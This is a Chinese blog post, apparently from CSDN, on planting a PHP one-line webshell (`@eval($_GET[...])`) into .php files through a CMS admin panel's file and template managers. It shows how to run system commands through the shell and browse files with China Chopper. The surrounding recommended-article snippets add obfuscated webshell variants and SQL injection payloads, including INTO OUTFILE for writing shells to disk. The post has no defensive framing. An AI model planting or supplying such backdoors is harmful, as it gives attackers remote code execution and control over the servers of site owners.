web渗透——PHP一句话插入

最新推荐文章于 2025-10-23 17:33:20 发布

原创最新推荐文章于 2025-10-23 17:33:20 发布 · 5.2k 阅读

5 ·

CC 4.0 BY-SA版权

文章标签：

#漏洞 #web #PHP

渗透专栏收录该内容

11 篇文章

订阅专栏

本文介绍了一种通过在特定PHP应用程序中插入恶意代码来实现远程代码执行的方法。具体操作包括在模块管理和模板管理等处植入代码，并展示了如何利用这些植入的代码进行文件系统的探测。

一句话：

<?php @eval($_GET['as']); ?> //as是形式参数

位置：

1、模块——模块管理——文件管理器

2、模板——模板管理——标签源码管理

3、、、

进入，选择.PHP文件，插入一句话

使用：

1、在网页上，、、、/dede/ad_add.php?as=system('dir'); //可以显示该目录下的文件、文件大小以及字节数

2、利用工具（菜刀），可以详细浏览目录下的文件

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

dongxie_tk

关注关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

PHP一句话木马深度详细剖析

Cwillchris的博客

06-01

1879

PHP一句话木马原理分析

phpinfo.php渗透

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

01-19

1297

如何获取phpinfo页面phpinfo.php渗透 1.1 目录扫描phpinfo.php渗透 1|2phpinfo.php渗透:gookle hacking

参与评论您还未登录，请先登录后发表或查看评论

一文讲清 PHP 文件包含漏洞：从渗透测试视角拆原理、讲利用，再给开发防御建议，收藏这一篇足够！

最新发布

2301_79455190的博客

10-23

560

文件包含漏洞是PHP应用程序中常见的安全问题，当开发者使用包含函数引入文件时，如果传入的文件名参数未经严格校验，攻击者就可能利用这个漏洞读取敏感文件甚至执行恶意代码。

PHP漏洞利用和渗透基础入门[2]

落叶花雪的博客

06-25

441

登录注入实例提示:了解Mysql和php可能更容易理解构造Mysql语句时利用一些方法使某些不应该返回的数据返回或者执行某种不该执行的命令这个过程就叫注入那我们来举个例子: $sql='select * from users where userName='$userName' and password='$password'; 代码逻辑(建议阅读)来自: https://blog....

免杀代码—— 一句话php

01-15

收集于互联网，仅限个人研究使用。

渗透基础PHP（零散知识点）

qq_52331099的博客

03-29

4138

查询语句：从admin表中查询 select字段 from表名 where条件 and =>要求and 等式两边都成立才成立 or = > 要求or等式两边有一边成立才成立 SQL注入核心：用户输入的数据被当做代码进行万能密码：' or 1 = 1 -- （这是注释的意思） #（警号注释只有mysql数据库专用）最好的操作： -- qwe and 优先级比 or 高现在主流防护：使用正则表达式来过滤用户传输的数据【这就是为什么注册密...

php网站渗透实战_PHP网站安全-漏洞渗透及解决方式—概述

weixin_39992417的博客

12-19

2567

针对PHP的网站主要存在下面几种攻击方式：1、命令注入(Command Injection)2、eval注入(Eval Injection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request Forgeries, C...

php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理

weixin_39800387的博客

02-19

2770

讲一下SQL注入中写一句话拿webshell的原理，主要使用的是 SELECT ... INTO OUTFILE 这个语句，下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下，我们的目的是在目...

[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令

热门推荐

杨秀璋的专栏

02-21

2万+

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文分享了微软证书漏洞（CVE-2020-0601），并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程，第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章，希望对您有所帮助。

渗透测试——sql手工注入实战 @apache+php+Mysql 正则注入

aming小老弟

07-05

210

0x01 Mysql 手工注入 1.1 联合注入登录后复制 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from informat...

Get Offer —— 渗透测试岗试题汇总（Web相关知识点）

Boom！脑洞大爆炸的博客

07-21

6224

一篇文章了解Web知识点

渗透测试工程师面试题总结(一)

记录开发和安全学习过程中的点点滴滴

08-26

1830

对渗透测试工程师的面试题进行总结

php+mysql快速渗透

weixin_30908941的博客

05-02

237

1）如何快速寻找站点注入漏洞？2）PHP+MYSQL数据库下快速寻找WEB站点路径？ 3）MYSQL LOAD FILE()下读取文件？3）MYSQL INTO OUTFILE下写入PHPSHELL？简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。1:...

渗透————PHP+MYSQL数据库（上）

longger_lee

11-12

1096

SQL简单命令： mysql -u username -ppassword -h ip //进入MYSQL数据库 show database; //查看数据库有哪些文件 select version(); //查看数据库版本 use admin; //选择admin数据库 show table

4.1.9. 其它

bylfsj的博客

10-31

526

4.1.9. 其它¶ 4.1.9.1. 低精度¶ php中并不是用高精度来存储浮点数，而是用使用 IEEE 754 双精度格式，造成在涉及到浮点数比较的时候可能会出现预期之外的错误。比如 php -r "var_dump(0.2+0.7==0.9);" 这行代码的输出是 bool(false) 而不是 bool(true)。这在一些情况下可能出现问题。 4.1.9.2. 弱类型¶ 如果使...

php后台配置插一句话马,php后台插一句话的思路

weixin_42304618的博客

04-08

473

php后台插一句话的思路加114网址导航后台拿webshell的方法。首先介绍下php的各种标签：1)：demo:这个标签现在程序大多都是使用的这种标签！大家都不陌生了，这里就不多介绍了！2)： echo "test"; ?>这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它，大多程序员都是很熟悉的！我们把这种标签称为短语标签！3)：demo:echo "test";这...

PHP基础学习【针对渗透】

m0_55854679的博客

12-11

1494

PHP基础教程 PHP属于后端语言，后端的核心在于与数据库交互。常见的后端语言：ASP、ASPX、PHP、JSP 什么是PHP？ PHP（超文本预处理器）是一种通用开源脚本语言，是动态语言的一种，动态语言还包括ASP、ASPX、JSP。 PHP语法吸收了C、java、Perl的特点，主要用于web开发领域。 PHP可以将程序嵌入到前端代码（HTML、CSS、JS）执行。 PHP支持几乎所有流行的数据库以及操作系统。基本语法 PHP头部标记风格 <?php ?> <script

WebShell变形

bylfsj的博客

10-31

628

4.1.7. WebShell¶ 4.1.7.1. 常见变形¶ GLOBALS eval($GLOBALS['_POST']['op']); $_FILE eval($_FILE['name']); 拆分 assert(${"_PO"."ST"} ['sz']); 动态函数执行 $k="ass"."ert"; $k(${"_PO"."ST"} ['sz...

phpcms模板嵌入php代码_代码审计之文件操作漏洞

weixin_39796868的博客

11-25

2412

文件操作包括文件包含、文件读取、文件删除、文件修改以及文件上传，这几种文件操作的漏洞有部分的相似点，但是每种漏洞都有各自的漏洞函数以及利用方式，下面我们来具体分析下它们的形成原因、挖掘方式以及修复方案。1. 文件包含漏洞PHP的文件包含可以直接执行包含文件的代码，包含的文件格式是不受限制的，只要能正常执行即可。文件包含又分为本地文件包含（local file include）和远程文件包含（rem...